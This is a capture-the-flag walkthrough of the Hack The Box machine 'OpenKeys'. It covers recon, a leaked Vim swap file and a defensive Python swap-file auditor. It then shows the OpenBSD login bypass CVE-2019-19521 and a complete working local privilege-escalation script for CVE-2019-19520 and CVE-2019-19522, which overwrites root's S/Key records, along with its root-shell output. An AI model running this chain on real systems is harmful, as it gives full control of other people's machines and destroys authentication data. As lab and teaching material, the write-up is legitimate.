Enumeration
Let's start with RustScan:
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ rustscan -t 1500 10.10.10.199 -r 1-65535 --ulimit 5000
Faster Nmap scanning with Rust.
Open 10.10.10.199:22
Open 10.10.10.199:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.10.199
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 11:42 IST
Initiating Ping Scan at 11:42
Scanning 10.10.10.199 [2 ports]
Completed Ping Scan at 11:42, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:42
Completed Parallel DNS resolution of 1 host. at 11:42, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 11:42
Scanning 10.10.10.199 [2 ports]
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199
Completed Connect Scan at 11:42, 0.42s elapsed (2 total ports)
Nmap scan report for 10.10.10.199
Host is up, received syn-ack (0.28s latency).
Scanned at 2020-10-12 11:42:08 IST for 0s
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
Port 22 (SSH) and port 80 (HTTP) are open.
Opening 10.10.10.199 in the browser redirects me to a login page.
Wappalyzer shows the website is running PHP.
Now let's scan for directories:
┌──(RajSec㉿kali)-[~/Desktop/bug/dirsearch]
└─$ ./dirsearch.py -u 10.10.10.199 -e php
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 20 | Wordlist size: 6707
301 443B http://10.10.10.199:80/js -> REDIRECTS TO: http://10.10.10.199/js/
301 443B http://10.10.10.199:80/css -> REDIRECTS TO: http://10.10.10.199/css/
301 443B http://10.10.10.199:80/fonts -> REDIRECTS TO: http://10.10.10.199/fonts/
301 443B http://10.10.10.199:80/images -> REDIRECTS TO: http://10.10.10.199/images/
301 443B http://10.10.10.199:80/includes -> REDIRECTS TO: http://10.10.10.199/includes/
200 711B http://10.10.10.199:80/includes/
200 5KB http://10.10.10.199:80/index.php
200 96B http://10.10.10.199:80/index.html
200 5KB http://10.10.10.199:80/index.php/login/
Browsing the discovered directories, I found an interesting file in /includes: auth.php.swp, a leftover editor swap file.
Let's fetch it with wget:
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ wget http://10.10.10.199/includes/auth.php.swp
--2020-10-12 12:19:54-- http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’
auth.php.swp [ <====> ] 12.00K 18.8KB/s in 0.6s
2020-10-12 12:19:56 (18.8 KB/s) - ‘auth.php.swp’ saved [12288]
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
The file header shows it is a Vim swap file created by user jennifer on host openkeys.htb while editing /var/www/htdocs/includes/auth.php.
Recovering the original file from the swap file with vim -r:
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ vim -r auth.php.swp
Using swap file "auth.php.swp"
"/var/www/htdocs/includes/auth.php" [New DIRECTORY]
Recovery completed. You should check if everything is OK.
(You might want to write out this file under another name
and run diff with the original file to check for changes)
You may want to delete the .swp file now.
Press ENTER or type command to continue_
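The swap file leaked the editing user, host and server-side path before its contents were even recovered. As an added example (not part of this writeup), the Python audit below scans a web root for editor leftovers such as auth.php.swp and parses the Vim swap header to report the same fields file(1) printed above; the sample swap header it plants is constructed test data built with the values seen on this box.

```python
import struct
import tempfile
from pathlib import Path
from typing import Optional

# Vim block0 layout, the offsets file(1) uses: pid at 24, user 28, host 68, file 108.
MAGIC = b"b0VIM "
PID_OFF, UNAME_OFF, HNAME_OFF, FNAME_OFF = 24, 28, 68, 108
UNAME_LEN, HNAME_LEN, FNAME_LEN = 40, 40, 900
LEFTOVER_SUFFIXES = (".swp", ".swo", ".swn", ".bak", ".orig", "~")

def _cstr(buf: bytes, off: int, length: int) -> str:
    """Read a NUL-terminated string from a fixed-size header field."""
    return buf[off:off + length].split(b"\0", 1)[0].decode("utf-8", "replace")

def parse_vim_swap(data: bytes) -> Optional[dict]:
    """Return what a Vim swap header leaks, or None if data is not one."""
    if not data.startswith(MAGIC) or len(data) < FNAME_OFF + FNAME_LEN:
        return None
    return {
        "pid": struct.unpack_from("<I", data, PID_OFF)[0],
        "user": _cstr(data, UNAME_OFF, UNAME_LEN),
        "host": _cstr(data, HNAME_OFF, HNAME_LEN),
        "file": _cstr(data, FNAME_OFF, FNAME_LEN),
    }

def audit_webroot(root: str) -> list:
    """List editor leftovers under root; Vim swaps also get their leaked fields."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.name.endswith(LEFTOVER_SUFFIXES):
            findings.append({"path": path.name, "swap": parse_vim_swap(path.read_bytes()[:4096])})
    return findings

def build_sample_swap(user: str, host: str, fname: str, pid: int) -> bytes:
    """Constructed test data: a minimal block0 header, not a real swap file."""
    hdr = bytearray(4096)
    hdr[0:9] = b"b0VIM 8.1"
    struct.pack_into("<I", hdr, PID_OFF, pid)
    for off, value in ((UNAME_OFF, user), (HNAME_OFF, host), (FNAME_OFF, fname)):
        hdr[off:off + len(value)] = value.encode()
    return bytes(hdr)

def demo() -> list:
    """Plant a sample swap file beside a clean index.php and audit the tree."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text("<?php echo 'ok'; ?>\n")
        Path(root, "auth.php.swp").write_bytes(build_sample_swap(
            "jennifer", "openkeys.htb", "/var/www/htdocs/includes/auth.php", 49850))
        return audit_webroot(root)
```

Running audit_webroot against the real document root in a deploy pipeline catches these files before they are served; the swap's file field also tells you which source file to diff for pending edits.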
The recovered auth.php (only the tail of the file is shown here; it starts mid-way through the session timeout check):
        $session_timeout)
        {
            close_session();
            return False;
        }
        else
        {
            // Session is active, update last activity time and return True
            $_SESSION['last_activity'] = $time;
            return True;
        }
    }
    else
    {
        return False;
    }
}

function init_session()
{
    $_SESSION["logged_in"] = True;
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["username"] = $_REQUEST['username'];
}

function close_session()
{
    session_unset();
    session_destroy();
    session_start();
}
?>
auth.php also references a check_auth binary in the auth_helpers directory. Let's wget it too:
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ wget http://10.10.10.199/auth_helpers/check_auth
--2020-10-12 12:44:37-- http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’
check_auth 100%[========================================================================>] 12.00K 20.9KB/s in 0.6s
2020-10-12 12:44:39 (20.9 KB/s) - ‘check_auth’ saved [12288/12288]
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
check_auth is an ELF executable built for OpenBSD, not Linux.
Trying to run it on Kali fails with "no such file or directory", because its interpreter /usr/libexec/ld.so does not exist on Linux:
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ ./check_auth
zsh: no such file or directory: ./check_auth
OpenBSD Auth Bypass
After some research I found an informative blog post on secpod.com.
As mentioned in the blog, there are four vulnerabilities:
- CVE-2019-19519 (Local privilege escalation)
- CVE-2019-19520 (Local privilege escalation)
- CVE-2019-19521 (Authentication Bypass)
- CVE-2019-19522 (Local privilege escalation)
According to the blog, logging in with the username -schallenge and a random password succeeds (the authentication bypass, CVE-2019-19521), but the page then shows the error "OpenSSH Key not found for user -schallenge".
It's time to change the username cookie to the value jennifer.
Refresh the page and log in again to get the SSH key for jennifer.
Getting User
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ ssh -i sshkey jennifer@10.10.10.199
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ whoami
jennifer
openkeys$ ls
user.txt
openkeys$ wc -c user.txt
33 user.txt
openkeys$
Gaining Root
We are going to use CVE-2019-19522 (local privilege escalation via S/Key and YubiKey), as mentioned in the blog. The script below first uses CVE-2019-19520 (xlock) to obtain auth group permissions and then CVE-2019-19522 to replace root's S/Key record:
#!/bin/sh
echo "openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)"
echo "[*] checking system ..."
if grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q yubikey ; then
    echo "[*] system supports YubiKey authentication"
    target='yubikey'
elif grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q skey ; then
    echo "[*] system supports S/Key authentication"
    target='skey'
    if ! test -d /etc/skey/ ; then
        echo "[-] S/Key authentication enabled, but has not been initialized"
        exit 1
    fi
else
    echo "[-] system does not support S/Key / YubiKey authentication"
    exit 1
fi
echo "[*] id: \`id\`"
echo "[*] compiling ..."
cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
    gid_t rgid, egid, sgid;
    if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF
cc -fpic -shared -s -o swrast_dri.so swrast_dri.c
rm -rf swrast_dri.c
echo "[*] running Xvfb ..."
display=":66"
env -i /usr/X11R6/bin/Xvfb $display -cc 0 &
echo "[*] testing for CVE-2019-19520 ..."
group=$(echo id -gn | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display)
if [ "$group" = "auth" ]; then
    echo "[+] success! we have auth group permissions"
else
    echo "[-] failed to acquire auth group permissions"
    exit 1
fi
# uncomment to drop to a shell with auth group permissions
#env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display ; exit
echo
echo "WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C)."
echo
sleep 5
if [ "$target" = "skey" ]; then
    echo "[*] trying CVE-2019-19522 (S/Key) ..."
    echo "rm -rf /etc/skey/root ; echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root ; chmod 0600 /etc/skey/root" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
    rm -rf swrast_dri.so
    echo "Your password is: EGG LARD GROW HOG DRAG LAIN"
    env -i TERM=vt220 su -l -a skey
fi
if [ "$target" = "yubikey" ]; then
    echo "[*] trying CVE-2019-19522 (YubiKey) ..."
    echo "rm -rf /var/db/yubikey/root.* ; echo 32d32ddfb7d5 > /var/db/yubikey/root.uid ; echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
    rm -rf swrast_dri.so
    echo "Your password is: krkhgtuhdnjclrikikklulkldlutreul"
    env -i TERM=vt220 su -l -a yubikey
fi
It will prompt for an S/Key password; enter the one-time password printed by the script:
EGG LARD GROW HOG DRAG LAIN
openkeys$ sh openbsd-privesc.sh
openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions
WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password:
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# whoami
root
openkeys# hostname
openkeys.htb
openkeys# wc -c /root/root.txt
33 /root/root.txt
openkeys#
Yup...! We rooted the box.